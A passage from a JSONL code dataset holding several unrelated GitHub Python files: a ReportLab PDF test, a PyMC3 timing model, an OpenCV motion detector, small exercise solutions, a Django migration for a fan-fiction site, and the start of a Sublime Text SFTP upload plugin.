0), 'MIDDLE'), # 对齐\n\t\t('LINEBEFORE', (0, 0), (0, -1), 0.1, colors.grey), # 设置表格左边线颜色为灰色,线宽为0.1\n\t\t('TEXTCOLOR', (0, 0), (-1, 0), colors.royalblue), # 设置表格内文字颜色\n\t\t('TEXTCOLOR', (0, -1), (-1, -1), colors.red), # 设置表格内文字颜色\n\t\t('GRID', (0, 0), (-1, -1), 0.5, colors.grey), # 设置表格框线为grey色,线宽为0.5\n\t]\n\n\tcomponent_table = Table(dis_list, colWidths=colWidths, style=style)\n\n\treturn component_table\n\n\ndef draw_pie_autoLegender( chart,title=''):\n\twidth = 448\n\theight = 230\n\td = Drawing(width,height)\n\tlab = Label()\n\tlab.x = 220 #x和y是文字的位置坐标\n\tlab.y = 210\n\tlab.setText(title)\n\tlab.fontName = 'SimSun' #增加对中文字体的支持\n\tlab.fontSize = 20\n\td.add(lab)\n\td.background = Rect(0,0,width,height,strokeWidth=1,strokeColor=\"#868686\",fillColor=None) #边框颜色\n\td.add(chart)\n\n\treturn d\n\ndef draw_pie(data=[], labels=[], use_colors=[], width=360,):\n '''更多属性请查询reportlab.graphics.charts.piecharts.WedgeProperties'''\n\n pie = Pie()\n pie.x = 60 # x,y饼图在框中的坐标\n pie.y = 20\n pie.slices.label_boxStrokeColor = colors.white #标签边框的颜色\n\n pie.data = data # 饼图上的数据\n pie.labels = labels # 数据的标签\n pie.simpleLabels = 0 # 0 标签在标注线的右侧;1 在线上边\n pie.sameRadii = 1 # 0 饼图是椭圆;1 饼图是圆形\n\n pie.slices.strokeColor = colors.red # 圆饼的边界颜色\n pie.strokeWidth=1 # 圆饼周围空白区域的宽度\n pie.strokeColor= colors.white # 整体饼图边界的颜色\n pie.slices.label_pointer_piePad = 10 # 圆饼和标签的距离\n pie.slices.label_pointer_edgePad = 25 # 标签和外边框的距离\n pie.width = width\n pie.direction = 'clockwise'\n pie.pointerLabelMode = 'LeftRight'\n # for i in range(len(labels)):\n # pie.slices[i].fontName = 'song' #设置中文\n for i, col in enumerate(use_colors):\n pie.slices[i].fillColor = col\n return pie\n\n\nif __name__ == \"__main__\":\n\telements = []\n\n\t# 设置上下左右的外边距\n\tleftMargin = 0.1*inch\n\trightMargin = 0.1*inch\n\ttopMargin=0.1*inch\n\tbottomMargin=0.1* inch\n\n\tpdf = SimpleDocTemplate('reportlab_test5.pdf', pagesize=landscape(letter) ,\n\t\t\t\t\t\t\tleftMargin=leftMargin,rightMargin=rightMargin,topMargin=topMargin, bottomMargin=bottomMargin) #设置页面横向\n\n\ttitle_style = ParagraphStyle(name=\"TitleStyle\", fontName=\"SimSun\", fontSize=48, alignment=TA_LEFT )\n\tsub_title_style = ParagraphStyle(name=\"SubTitleStyle\", fontName=\"SimSun\", fontSize=32,textColor=colors.HexColor(0x666666), alignment=TA_LEFT)\n\tcontent_style = ParagraphStyle(name=\"ContentStyle\", fontName=\"SimSun\", fontSize=18, leading=25, spaceAfter=20,underlineWidth=1, alignment=TA_LEFT )\n\tfoot_style = ParagraphStyle(name=\"FootStyle\", fontName=\"SimSun\", fontSize=14,textColor=colors.HexColor(0xB4B4B4),leading=25, spaceAfter=20, alignment=TA_CENTER)\n\n\tpage1 = text_test()\n\telements.append(page1)\n\telements.append(Spacer(1, 10 * mm))\n\telements.append(Paragraph(\"测试报告\", title_style))\n\telements.append(Spacer(1, 10 * mm))\n\telements.append(Paragraph(\"Test Report of XXX\", sub_title_style))\n\telements.append(Spacer(1, 15 * mm))\n\telements.append(Paragraph(\"报告编号:\" + \"007\", content_style))\n\telements.append(Paragraph(\"计划名称:\" + \"xxx软件测试报告\", content_style))\n\telements.append(Paragraph(\"报告日期:\" + \"2019-10-23\", content_style))\n\telements.append(Paragraph(\" 负责人:\" + \"测试组\", content_style))\n\telements.append(Spacer(1, 15 * mm))\n\telements.append(Paragraph(\"内部文档,请勿外传\", foot_style))\n\telements.append(PageBreak())\n\n\t# page2 = autoLegender(\"你好!\")\n\t# elements.append(page2)\n\t# elements.append(PageBreak())\n\n\t# elements.append(Spacer(1, 5.5* inch))\n\telements.append(Spacer(1, 1 * mm))\n\tStyle = getSampleStyleSheet()\n\tn = Style['Normal']\n\tdata = [[0, 1, 2, 3, 4, 5, 6, 7],\n\t\t\t[00, 11, 22, 33, 44, 55, 66, 77],\n\t\t\t[000, 111, 222, 333, 444, 555, 666, 777],\n\t\t\t[0000, 1111, 2222, 3333, 4444, 5555, 6666, 7777], ]\n\tpage3_table = table_model(data)\n\telements.append(Paragraph('Title', n))\n\telements.append(page3_table)\n\n\n\tdata = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\n\tlabs = ['0000000', '1111111', '2222222', '3333333', '4444444',\n\t\t\t'5555555', '6666666', '7777777', '8888888', '9999999']\n\tcolor = [HexColor(\"#696969\"), HexColor(\"#A9A9A9\"), HexColor(\"#D8BFD8\"),\n\t\t\t HexColor(\"#DCDCDC\"), HexColor('#E6E6FA'), HexColor(\"#B0C4DE\"),\n\t\t\t HexColor(\"#778899\"), HexColor('#B0C4DE'), HexColor(\"#6495ED\"),\n\t\t\t HexColor(\"#483D8B\")\n\t\t\t ]\n\tpage4 = draw_pie_autoLegender(draw_pie(data, labs, color), \"饼状图\")\n\telements.append(Spacer(1, 2 * inch))\n\telements.append(Spacer(1, 2 * inch))\n\telements.append(Spacer(1, 2 * inch))\n\n\telements.append(page4)\n\telements.append(PageBreak())\n\n\t# img = Image('./地云土地报告PPT模板/PPT封面.png')\n\t# img.drawHeight = 16 * cm\n\t# img.drawWidth = 33 * cm\n\t# # img.hAlign = TA_LEFT\n\t# elements.append(img)\n\t# text_test = text_test()\n\t# elements.append(text_test)\n\n\n\t# elements.append(PageBreak())\n\t#\n\t# img = Image('./地云土地报告PPT模板/toubu.png')\n\t# img.drawHeight = 16 * cm\n\t# img.drawWidth = 33 * cm\n\t# elements.append(img)\n\t# elements.append(PageBreak())\n\n\t# todo SimpleDocTemplate.build()的方式创建PDF, 目前没法插入背景图片(平铺与拉伸),也没法在背景图上加文字\n\n\tpdf.build(elements)\n\n","repo_name":"lizhou828/python_hello_world","sub_path":"helloWorld/pdf_template/reportlab_test5.py","file_name":"reportlab_test5.py","file_ext":"py","file_size_in_byte":8369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"70680097208","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pymc3 as pm\nimport arviz as az\n\nmodel = pm.Model()\nif __name__ == '__main__':\n with model:\n clienti = pm.Poisson('C', mu=20)\n comanda = pm.Normal('Cmd',mu=1,sigma=0.5)\n gatit = pm.Exponential('G',lam=1/10) #alpha=10\n timp = pm.Normal('T',gatit+comanda)\n trace = pm.sample(2000)\n\n dictionary = {\n 'clienti': trace['C'].tolist(),\n 'comanda': trace['Cmd'].tolist(),\n 'gatit': trace['G'].tolist(),\n 'timp': trace['T'].tolist()\n }\n df=pd.DataFrame(dictionary)\n\n #Valoarea alpha=10 este voloarea maxima pentru care probabiltitatea este 95% ca timpul de servire este mai mic de 15 minute\n p_timp= df[(df['timp'] <=15)].shape[0] / df.shape[0]\n\n sumtimp=0\n for idx in range(df.shape[0]):\n sumtimp+=df.at[idx,'timp']\n\n medie= sumtimp /df.shape[0]\n print(p_timp)\n print(medie)\n\n","repo_name":"LupuFlorin/PMP_LupuFlorinB1","sub_path":"Lab4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9315813603","text":"import cv2\r\nfrom datetime import datetime\r\n\r\n\r\n\"\"\" detect the motion \"\"\"\r\ndef motion_detector(frame, cnts, cap_flag, motion_flag, status_list, motion_time, out):\r\n '''\r\n detect the motion using the value of contours\r\n writes the state of movement\r\n write the date and time on live videos\r\n '''\r\n text = 'No Motion' \r\n for cnt in cnts:\r\n if cv2.contourArea(cnt) < 700:\r\n continue\r\n\r\n text = 'Motion'\r\n\r\n motion_flag = 1\r\n #(x, y, w, h) = cv2.boundingRect(cnt)\r\n #cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 255), 2)\r\n\r\n status_list.append(motion_flag)\r\n\r\n # to save memory\r\n status_list = status_list[-2:]\r\n\r\n if status_list[-1] == 1 and status_list[-2] == 0:\r\n motion_time.append(datetime.now())\r\n\r\n if status_list[-1] == 0 and status_list[-2] == 1:\r\n motion_time.append(datetime.now())\r\n\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n\r\n cv2.putText(frame, f'[+] Room Status: {text}', (10, 20), font, 0.5, (0, 0 ,255), 1, cv2.LINE_AA)\r\n\r\n if cap_flag == 1:\r\n cv2.putText(frame, datetime.now().strftime(r'%A %d %B %Y %I:%M:%S %p'), \r\n (10, frame.shape[0]-10), font, 0.5, (0, 0 ,255), 1, cv2.LINE_AA)\r\n\r\n # write in case of motion\r\n if motion_flag == 1:\r\n out.write(frame)\r\n \r\n return (motion_flag, status_list)","repo_name":"tarek0m/Big-Brother-Is-Watching-You","sub_path":"motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29492473449","text":"def decodificar(mensaje):\n opcion = \"\"\n letra = \"\"\n numero = \"\"\n if (opcion == 1):\n letra=input(\"\\nIntroduce la Letra > \")\n ord(letra) #Con esto lo que hago es que muestre el valor ascii de la variable\n letra2 = ord(letra) #Copio el valor a otra variable\n print(\"El valor Ascii es:\", +letra2)\n print(\"\\n\\n\")\n elif (opcion == 2):\n numero=input(\"\\nIntroduce el numero > \")\n chr(numero) #Valor que me da\n numero2 = chr(numero) #copio el valor a otra variable\n print(\"\\nEl valor de la letra es:\", +numero2)\n print(\"\\n\\n\")\n \n else:\n print(\"No valido\")\n print(\"\\n\\n\")\n\nif __name__ == \"__main__\":\n mensaje=decodificar(\"01101000,01101111,01101100,01100001\")\n print(mensaje)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej3/tema9_ej3_jadelzo.py","file_name":"tema9_ej3_jadelzo.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32437810891","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\ndef sort(arr ,k):\n return sorted(\n arr,\n key = lambda a: a[k]\n )\n\n\n\nif __name__ == '__main__':\n nm = input().split()\n\n n = int(nm[0])\n\n m = int(nm[1])\n\n arr = []\n\n for _ in range(n):\n arr.append(list(map(int, input().rstrip().split())))\n\n k = int(input())\n\n sorted_arr = sort(arr, k)\n\n for el in sorted_arr:\n print(' '.join(map(str,el)))\n","repo_name":"Ephrathah0/A2SV-competitve-programming","sub_path":"python practice/any or all.py","file_name":"any or all.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"16352850907","text":"# Determine whether an integer is a palindrome. Do this without extra space.\n#\n#hint: Could negative integers be palindromes? (ie, -1)\n#\n# If you are thinking of converting the integer to string, note the restriction of using extra space.\n#\n# You could also try reversing an integer. However, if you have solved the problem \"Reverse Integer\", you know that the reversed integer might overflow. How would you handle such case?\n#\n# There is a more generic way of solving this problem.\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if (x<0 or (x!=0 and x%10==0)): # x not neg, if x= 10,100,1000,....\n return False\n rev = 0\n while (x>rev):\n rev = rev *10 + x%10 # creating the reverse number using the digits\n x = x/10\n return x==rev or x==rev/10 # if x == rev, when x = 1 to 9 have to divide with 10\n","repo_name":"harishpuvvada/Algorithms-using-Python","sub_path":"Misc/Leetcode - Palindrome number .py","file_name":"Leetcode - Palindrome number .py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"27940402625","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\nimport ponyFiction.fields\nimport django.contrib.auth.models\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Author',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('password', models.CharField(verbose_name='password', max_length=128)),\n ('last_login', models.DateTimeField(null=True, verbose_name='last login', blank=True)),\n ('is_superuser', models.BooleanField(help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status', default=False)),\n ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, unique=True, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', verbose_name='username', max_length=30, validators=[django.core.validators.RegexValidator('^[\\\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.', 'invalid')])),\n ('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),\n ('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),\n ('email', models.EmailField(max_length=254, verbose_name='email address', blank=True)),\n ('is_staff', models.BooleanField(help_text='Designates whether the user can log into this admin site.', verbose_name='staff status', default=False)),\n ('is_active', models.BooleanField(help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active', default=True)),\n ('date_joined', models.DateTimeField(verbose_name='date joined', default=django.utils.timezone.now)),\n ('bio', models.TextField(max_length=2048, verbose_name='О себе', blank=True)),\n ('jabber', models.EmailField(max_length=75, verbose_name='Jabber', blank=True)),\n ('skype', models.CharField(max_length=256, verbose_name='Skype ID', blank=True)),\n ('tabun', models.CharField(max_length=256, verbose_name='Табун', blank=True)),\n ('forum', models.URLField(verbose_name='Форум', blank=True)),\n ('vk', models.URLField(verbose_name='VK', blank=True)),\n ('excluded_categories', ponyFiction.fields.SeparatedValuesField(null=True, verbose_name='Скрытые категории', max_length=200)),\n ('detail_view', models.BooleanField(verbose_name='Детальное отображение рассказов', default=False)),\n ('nsfw', models.BooleanField(verbose_name='NSFW без предупреждения', default=False)),\n ('groups', models.ManyToManyField(blank=True, related_query_name='user', help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', verbose_name='groups', to='auth.Group', related_name='user_set')),\n ('user_permissions', models.ManyToManyField(blank=True, related_query_name='user', help_text='Specific permissions for this user.', verbose_name='user permissions', to='auth.Permission', related_name='user_set')),\n ],\n options={\n 'verbose_name': 'автор',\n 'verbose_name_plural': 'авторы',\n },\n managers=[\n ('objects', django.contrib.auth.models.UserManager()),\n ],\n ),\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата последнего просмотра автором', auto_now_add=True)),\n ('last_views', models.IntegerField(verbose_name='Последнее количество просмотров', default=0)),\n ('last_comments', models.IntegerField(verbose_name='Последнее количество комментариев', default=0)),\n ('last_vote_up', models.IntegerField(verbose_name=\"Последнее количество голосов 'За'\", default=0)),\n ('last_vote_down', models.IntegerField(verbose_name=\"Последнее количество голосов 'Против'\", default=0)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор просмотра', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'активность',\n 'verbose_name_plural': 'активность',\n },\n ),\n migrations.CreateModel(\n name='BetaReading',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('checked', models.BooleanField(verbose_name='Вычитано бетой', default=False)),\n ('beta', models.ForeignKey(null=True, verbose_name='Бета', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'вычитка',\n 'verbose_name_plural': 'вычитки',\n },\n ),\n migrations.CreateModel(\n name='Bookmark',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата добавления в список для прочтения', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'закладка рассказа',\n 'verbose_name_plural': 'закладки рассказов',\n },\n ),\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'жанр',\n 'verbose_name_plural': 'жанры',\n },\n ),\n migrations.CreateModel(\n name='Chapter',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('mark', models.PositiveSmallIntegerField(verbose_name='Оценка', default=0)),\n ('notes', models.TextField(verbose_name='Заметки к главе', blank=True)),\n ('order', models.PositiveSmallIntegerField(verbose_name='Порядок глав в рассказу', default=1)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('text', models.TextField(verbose_name='Текст главы', blank=True)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('words', models.IntegerField(verbose_name='Количество слов в главе', default=0)),\n ],\n options={\n 'verbose_name': 'глава',\n 'verbose_name_plural': 'главы',\n },\n ),\n migrations.CreateModel(\n name='Character',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Биография', blank=True)),\n ('name', models.CharField(verbose_name='Имя', max_length=256)),\n ],\n options={\n 'verbose_name': 'персонаж',\n 'verbose_name_plural': 'персонажи',\n },\n ),\n migrations.CreateModel(\n name='CharacterGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('name', models.CharField(verbose_name='Название группы', max_length=256)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание группы', blank=True)),\n ],\n options={\n 'verbose_name': 'Группа персонажей',\n 'verbose_name_plural': 'Группы персонажей',\n },\n ),\n migrations.CreateModel(\n name='Classifier',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'событие',\n 'verbose_name_plural': 'события',\n },\n ),\n migrations.CreateModel(\n name='CoAuthorsSeries',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('approved', models.BooleanField(verbose_name='Подтверждение', default=False)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CoAuthorsStory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('approved', models.BooleanField(verbose_name='Подтверждение', default=False)),\n ('author', models.ForeignKey(verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('text', models.TextField(verbose_name='Текст комментария')),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('ip', models.GenericIPAddressField(verbose_name='IP комментатора', default='0.0.0.0')),\n ('author', models.ForeignKey(null=True, verbose_name='Автор комментария', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'комментарий',\n 'verbose_name_plural': 'комментарии',\n },\n ),\n migrations.CreateModel(\n name='Favorites',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата добавления в избранное', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'избранное',\n 'verbose_name_plural': 'избранное',\n },\n ),\n migrations.CreateModel(\n name='InSeriesPermissions',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('order', models.PositiveSmallIntegerField(verbose_name='Порядок рассказов в серии', default=1)),\n ('request', models.BooleanField(verbose_name='Запрос на добавление', default=False)),\n ('answer', models.BooleanField(verbose_name='Ответ на запрос', default=False)),\n ],\n options={\n 'verbose_name': 'добавление в серию',\n 'verbose_name_plural': 'добавления в серию',\n },\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('description', models.TextField(max_length=4096, verbose_name='Описание', blank=True)),\n ('name', models.CharField(verbose_name='Название', max_length=256)),\n ],\n options={\n 'verbose_name': 'рейтинг',\n 'verbose_name_plural': 'рейтинги',\n },\n ),\n migrations.CreateModel(\n name='Series',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('cover', models.BooleanField(verbose_name='Наличие обложки', default=False)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('draft', models.BooleanField(verbose_name='Черновик', default=True)),\n ('finished', models.BooleanField(verbose_name='Оконченность cерии', default=False)),\n ('freezed', models.BooleanField(verbose_name='Статус \"заморозки\"', default=False)),\n ('mark', models.PositiveSmallIntegerField(verbose_name='Оценка', default=0)),\n ('notes', models.TextField(max_length=8192, verbose_name='Заметки к серии', blank=True)),\n ('original', models.BooleanField(verbose_name='Статус оригинала', default=True)),\n ('summary', models.TextField(verbose_name='Общее описание', max_length=8192)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('views', models.IntegerField(verbose_name='Количество просмотров', default=0)),\n ('authors', models.ManyToManyField(verbose_name='Авторы', to=settings.AUTH_USER_MODEL, through='ponyFiction.CoAuthorsSeries')),\n ],\n options={\n 'verbose_name': 'серия',\n 'verbose_name_plural': 'серии',\n },\n ),\n migrations.CreateModel(\n name='Story',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('title', models.CharField(verbose_name='Название', max_length=512)),\n ('cover', models.BooleanField(verbose_name='Наличие обложки', default=False, editable=False)),\n ('date', models.DateTimeField(verbose_name='Дата публикации', auto_now_add=True)),\n ('draft', models.BooleanField(verbose_name='Черновик', default=True)),\n ('approved', models.BooleanField(verbose_name='Одобрен', default=False)),\n ('finished', models.BooleanField(verbose_name='Закончен', default=False)),\n ('freezed', models.BooleanField(verbose_name='Заморожен', default=False)),\n ('notes', models.TextField(max_length=4096, verbose_name='Заметки к рассказу', blank=True)),\n ('original', models.BooleanField(verbose_name='Оригинальный (не перевод)', default=True)),\n ('summary', models.TextField(verbose_name='Общее описание', max_length=4096)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('vote_up_count', models.PositiveIntegerField(default=0)),\n ('vote_down_count', models.PositiveIntegerField(default=0)),\n ('vote_rating', models.FloatField(default=0)),\n ('authors', models.ManyToManyField(verbose_name='Авторы', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.CoAuthorsStory')),\n ('betas', models.ManyToManyField(related_name='beta_set', verbose_name='Бета-читатели', to=settings.AUTH_USER_MODEL, through='ponyFiction.BetaReading')),\n ('bookmarks', models.ManyToManyField(related_name='bookmarked_story_set', verbose_name='Отложённость', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.Bookmark')),\n ('categories', models.ManyToManyField(verbose_name='Жанры', to='ponyFiction.Category')),\n ('characters', models.ManyToManyField(verbose_name='Персонажи', blank=True, to='ponyFiction.Character')),\n ('classifications', models.ManyToManyField(verbose_name='События', blank=True, to='ponyFiction.Classifier')),\n ('favorites', models.ManyToManyField(related_name='favorites_story_set', verbose_name='Избранность', blank=True, to=settings.AUTH_USER_MODEL, through='ponyFiction.Favorites')),\n ('in_series', models.ManyToManyField(verbose_name='Принадлежность к серии', blank=True, to='ponyFiction.Series', through='ponyFiction.InSeriesPermissions')),\n ('rating', models.ForeignKey(null=True, verbose_name='Рейтинг', to='ponyFiction.Rating')),\n ],\n options={\n 'verbose_name': 'рассказ',\n 'verbose_name_plural': 'рассказы',\n },\n ),\n migrations.CreateModel(\n name='StoryEditLogItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('action', models.SmallIntegerField(choices=[(1, 'опубликовал'), (2, 'отправил в черновики'), (3, 'одобрил'), (4, 'отозвал'), (5, 'отредактировал')])),\n ('json_data', models.TextField(null=True)),\n ('date', models.DateTimeField(db_index=True, auto_now_add=True)),\n ('is_staff', models.BooleanField()),\n ('story', models.ForeignKey(related_name='edit_log', to='ponyFiction.Story')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='StoryView',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата просмотра', auto_now_add=True)),\n ('author', models.ForeignKey(null=True, verbose_name='Автор просмотра', to=settings.AUTH_USER_MODEL)),\n ('chapter', models.ForeignKey(related_name='chapter_views_set', null=True, verbose_name='Глава рассказа', to='ponyFiction.Chapter')),\n ('story', models.ForeignKey(related_name='story_views_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story')),\n ],\n options={\n 'verbose_name': 'просмотр',\n 'verbose_name_plural': 'просмотры',\n },\n ),\n migrations.CreateModel(\n name='Vote',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),\n ('date', models.DateTimeField(verbose_name='Дата голосования', auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),\n ('ip', models.GenericIPAddressField(verbose_name='IP автора', default='0.0.0.0')),\n ('plus', models.NullBooleanField(verbose_name='Плюс')),\n ('minus', models.NullBooleanField(verbose_name='Минус')),\n ('author', models.ForeignKey(null=True, verbose_name='Автор голоса', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'verbose_name': 'голос',\n 'verbose_name_plural': 'голоса',\n },\n ),\n migrations.AddField(\n model_name='story',\n name='vote',\n field=models.ManyToManyField(verbose_name='Голоса за рассказ', to='ponyFiction.Vote'),\n ),\n migrations.AddField(\n model_name='inseriespermissions',\n name='series',\n field=models.ForeignKey(null=True, verbose_name='Серия', to='ponyFiction.Series'),\n ),\n migrations.AddField(\n model_name='inseriespermissions',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='favorites',\n name='story',\n field=models.ForeignKey(related_name='favorites_story_related_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='comment',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Отношение к рассказу', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='coauthorsstory',\n name='story',\n field=models.ForeignKey(verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='coauthorsseries',\n name='series',\n field=models.ForeignKey(null=True, verbose_name='Серия', to='ponyFiction.Series'),\n ),\n migrations.AddField(\n model_name='character',\n name='group',\n field=models.ForeignKey(null=True, verbose_name='Группа персонажа', to='ponyFiction.CharacterGroup'),\n ),\n migrations.AddField(\n model_name='chapter',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='Отношение к рассказу', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='bookmark',\n name='story',\n field=models.ForeignKey(related_name='bookmarks_related_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='betareading',\n name='story',\n field=models.ForeignKey(null=True, verbose_name='История вычитки', to='ponyFiction.Story'),\n ),\n migrations.AddField(\n model_name='activity',\n name='story',\n field=models.ForeignKey(related_name='story_activity_set', null=True, verbose_name='Рассказ', to='ponyFiction.Story'),\n ),\n migrations.AlterIndexTogether(\n name='storyeditlogitem',\n index_together=set([('story', 'date'), ('is_staff', 'date')]),\n ),\n migrations.AlterIndexTogether(\n name='story',\n index_together=set([('approved', 'draft', 'date'), ('approved', 'draft', 'vote_rating')]),\n ),\n ]\n","repo_name":"andreymal/ponyFiction","sub_path":"ponyFiction/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":24655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70478488889","text":"import json\nimport re\nfrom pathlib import Path, PurePosixPath\n\nimport paramiko\n\nimport sublime\nimport sublime_plugin\n\nSETTINGS = \"QuickSFTP.sublime-settings\"\nLABEL = \"quick_sftp\"\nINIT_COMMAND = LABEL + \"_init\"\nUPLOAD_COMMAND = LABEL + \"_upload\"\n\nDEFAULTS = {\n \"name\": None,\n \"username\": None,\n \"password\": None,\n \"knownHostsPath\": None,\n \"privateKeyPath\": None,\n \"host\": None,\n \"port\": 22,\n \"remotePath\": None,\n \"connectTimeout\": 5,\n \"directoryPermissions\": \"755\",\n \"filePermissions\": \"644\",\n \"uploadOnSave\": False,\n \"ignore\": [],\n}\n\n\ndef pp(text, label=None, exit_=False):\n \"Simple 